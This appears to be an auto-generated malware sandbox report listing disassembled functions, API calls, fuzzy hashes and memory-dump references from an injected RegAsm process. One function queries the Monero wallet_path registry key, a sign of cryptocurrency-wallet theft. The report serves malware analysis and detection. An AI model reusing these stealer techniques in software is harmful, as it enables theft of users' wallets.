Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$cannot open file$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-1799306995
Opcode ID: 1ce083f51610d9518e5d6863c0f978e8e6bc103c39a92b16259da904a06f730a
Instruction ID: 42741db42894c7ea46633709cc87a12ab2b7856c1a5d90c2f45681cf5cbb6081
Opcode Fuzzy Hash: 1ce083f51610d9518e5d6863c0f978e8e6bc103c39a92b16259da904a06f730a
Instruction Fuzzy Hash: DCB09B5550924035DA012974CC02FDE3C147764E06F818454714537395D155C091C235

Function 1B6A7DA0 Relevance: 6.2, APIs: 4, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81868e2e5691cbd84d66fb5ebd2ecfee2e7f99df9be68527d7319b28201c9681
Instruction ID: 2dd64fb8ef3e1bee80494d187ab578a3eea3580244a2e5ce1e6df376e27ef934
Opcode Fuzzy Hash: 81868e2e5691cbd84d66fb5ebd2ecfee2e7f99df9be68527d7319b28201c9681
Instruction Fuzzy Hash: 5141DDB66013019FDB14CF28D981AA2F7E0FF94324F14456AE98787A22D772FC51CB90

Function 1B6ACAE0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f37f787fe65c4bda945479cfbeebef1d6a1c130538cd1e6f3fa2038f47e137a2
Instruction ID: 57ea503394defcf5f64aa14cec31f80cc51916020d54c720096f091b86c00cad
Opcode Fuzzy Hash: f37f787fe65c4bda945479cfbeebef1d6a1c130538cd1e6f3fa2038f47e137a2
Instruction Fuzzy Hash: 8231BEF6A053019BDB108F78EC40A96B3A4EB94661F00097AE945C7690E322ED84DBA1

Function 1B6AB1F0 Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
Instruction ID: f44db62cd0b579509f4aa6f3a400b71003f4f25e03882ddd4aec561906a1dbc9
Opcode Fuzzy Hash: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
Instruction Fuzzy Hash: 5C3172B5504B419FDB20CB25E8506EBBBE1BFA5314F084D6ED4DAC6900D371F88ACB55

Function 00412A1B Relevance: 6.1, APIs: 4, Instructions: 92stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00412A20
strtok_s.MSVCRT ref: 00412A47
StrCmpCA.SHLWAPI(00000000,004276E8,?,?,?,?,00418314), ref: 00412A78
strtok_s.MSVCRT ref: 00412AD9

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s$H_prolog
String ID:
API String ID: 1158113254-0
Opcode ID: 72671a45a9eca9d79b2a07ad106bcfcc466bf569881abec9326c48bdd8826eda
Instruction ID: 46d7b75c712e8c7e73b6622e7cec96a3a0e6db06e8b2e8e20495d57be24ae387
Opcode Fuzzy Hash: 72671a45a9eca9d79b2a07ad106bcfcc466bf569881abec9326c48bdd8826eda
Instruction Fuzzy Hash: 2B21F571600502AFCB28DF60CAD1EFBB3ACEF54354B10412FE017D6591EBB8ED918A64

Function 004128A0 Relevance: 6.1, APIs: 4, Instructions: 78stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004128A5
strtok_s.MSVCRT ref: 004128CC
StrCmpCA.SHLWAPI(00000000,004276DC,00000001,?,?,?,0041822C), ref: 00412908

Part of subcall function 0041077F: lstrlenA.KERNEL32(?,00000000,?,00417DE8,0042770E,0042770B,00000000,00000000,?,004187CB), ref: 00410788
Part of subcall function 0041077F: lstrcpy.KERNEL32(00000000,00000000), ref: 004107BC

strtok_s.MSVCRT ref: 00412944

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s$H_prologlstrcpylstrlen
String ID:
API String ID: 539094379-0
Opcode ID: f6a3b695288a34808bbe589bb357be1ef5427cf9242ace7d8b57039bee6dc709
Instruction ID: 16669ff98ca41c50ad208ab7513e07a337bc7d5c363cc68b379856a7f7a10eb1
Opcode Fuzzy Hash: f6a3b695288a34808bbe589bb357be1ef5427cf9242ace7d8b57039bee6dc709
Instruction Fuzzy Hash: BD21BBB1710505ABC714DF68CA85BEF73ACEF14315F00412FE016E6191EBBCD9858A64

Function 1B87F4CA Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,00000000,?,?,00000000), ref: 1B87F4E0
GetLastError.KERNEL32(?,?,?,?), ref: 1B87F4ED
SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 1B87F513
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 1B87F539

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID: FilePointer$ErrorLast
String ID:
API String ID: 142388799-0
Opcode ID: 67f0583d43038b6b74bfaae0a203d09bab8be8ba6704f424a009f9666f2c0e95
Instruction ID: e5dbb8628991e16f7b11f8a770bda6e6585dd71a4c977efd5605f1a82e3e3176
Opcode Fuzzy Hash: 67f0583d43038b6b74bfaae0a203d09bab8be8ba6704f424a009f9666f2c0e95
Instruction Fuzzy Hash: 651157B180026ABBDF00AF56CC889DEBFB9EF00B64F104144F824A31A0D731DA84CBA0

Function 0041A599 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0041A5BF

Part of subcall function 0041A3EB: __fltout2.LIBCMT ref: 0041A416

__cftog_l.LIBCMT ref: 0041A5E5
__cftoe_l.LIBCMT ref: 0041A617

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 4dac488de0b5ea22eb8b3e3f0a927e5300db818d9023db6c84b715e62ad05f11
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 3211807200114EBBCF125F84CC05CEE3F27BB58354B198416FE6859135C33AC9B2AB8A

Function 00410884 Relevance: 6.0, APIs: 4, Instructions: 45stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00410889
lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
lstrcpy.KERNEL32(00000000), ref: 004108D8
lstrcat.KERNEL32(?,?), ref: 004108E3

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcatlstrcpylstrlen
String ID:
API String ID: 809291720-0
Opcode ID: b4c0e9b2cb4bcdc9af996fdff662cf08f9ccba68d92128a37ec5bc8ecda07743
Instruction ID: 25bb938962741e6da67c87ee047a36148cef465288252c8de946109ad76006c3
Opcode Fuzzy Hash: b4c0e9b2cb4bcdc9af996fdff662cf08f9ccba68d92128a37ec5bc8ecda07743
Instruction Fuzzy Hash: A4011E76900245EFCB109F9AD88459EFBB5FF49314B10883FE599D7210C7B499C0DB54

Function 00401000 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
RegOpenKeyExA.ADVAPI32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: a2144c8192d29a4efe0118f6c8296b351efe17ba2df171fffd1a983c69a1242c
Instruction ID: e71daa9729e8068a2842f725c9e4988cb9708c25c23b2ab33cdb3659d8ec7e12
Opcode Fuzzy Hash: a2144c8192d29a4efe0118f6c8296b351efe17ba2df171fffd1a983c69a1242c
Instruction Fuzzy Hash: 97F03079240248FFEB115F90DD0AFEE7F7AEB46B04F104024F701A91A0D7B19A909B60

Function 00410A20 Relevance: 6.0, APIs: 4, Instructions: 33memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,004275CB), ref: 00410A2E
HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,004275CB), ref: 00410A35
GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,004275CB), ref: 00410A41
wsprintfA.USER32 ref: 00410A6C

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: 0af70038ec29b6a01a92711a617902467fefcdd575014af2bcb26ad1b7425da6
Instruction ID: 367e5e9189062848cc71d65be8a9990443451ec89354ec7a893e570611d3fba5
Opcode Fuzzy Hash: 0af70038ec29b6a01a92711a617902467fefcdd575014af2bcb26ad1b7425da6
Instruction Fuzzy Hash: 31F012AA900124BBDB50ABD99D09AFF76FDFB0DA06F001042FF41E5190E6388A90D7B0

Function 1B682ABD Relevance: 6.0, APIs: 4, Instructions: 30COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 1B881382
GetLastError.KERNEL32 ref: 1B88138E
___initconout.LIBCMT ref: 1B88139E

Part of subcall function 1B881303: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1B8813A3), ref: 1B881316

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 1B8813B3

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID: ConsoleWrite$CreateErrorFileLast___initconout
String ID:
API String ID: 3431868840-0
Opcode ID: ee2c0c33c15f118042c2b801396389a00e2110b23c07eefc390e390bb6af7038
Instruction ID: 29ffef25adb824ac628d7cdddb5f6df27205bcf6a0337e75e965b2301d98043f
Opcode Fuzzy Hash: ee2c0c33c15f118042c2b801396389a00e2110b23c07eefc390e390bb6af7038
Instruction Fuzzy Hash: 29F0307A54013BBBCF262FD6DC899CD7F66FB48EA1F014020FA1886524DF36D8649B90

Function 1B69BE80 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 314COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 1B69C1B5

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: 9acf98f72d84beea4c8074ab9376d38a94058cc1f6f92303bbd5da570f604ad2
Instruction ID: 344b549cf98dc3d432f84adfbefa93e1cc059a623ee674bb1fc3002c629a086d
Opcode Fuzzy Hash: 9acf98f72d84beea4c8074ab9376d38a94058cc1f6f92303bbd5da570f604ad2
Instruction Fuzzy Hash: B4A16AF19087868FEB048E28EC417D6B7D1AFA9220F580B1DF4E5873E5E771D4858B85

Function 1B807300 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

%!.15g, xrefs: 1B8075C3
-, xrefs: 1B807538

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %!.15g$-
API String ID: 0-583212262
Opcode ID: b7a54c3cb8612d867470b9d52633d08c02cc623a4019f8ef8c435c044facac11
Instruction ID: 4d8b55f05faf57fe57ef157581e069c0ac2153d24d6b6c0272e93d0a5a9c357a
Opcode Fuzzy Hash: b7a54c3cb8612d867470b9d52633d08c02cc623a4019f8ef8c435c044facac11
Instruction Fuzzy Hash: CE918B75A083468FD704DF2DD89179AFBE0EBC8740F44492DE998C7351EBB9D8098B92

Function 1B6CCBF0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 1B6CCE39

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

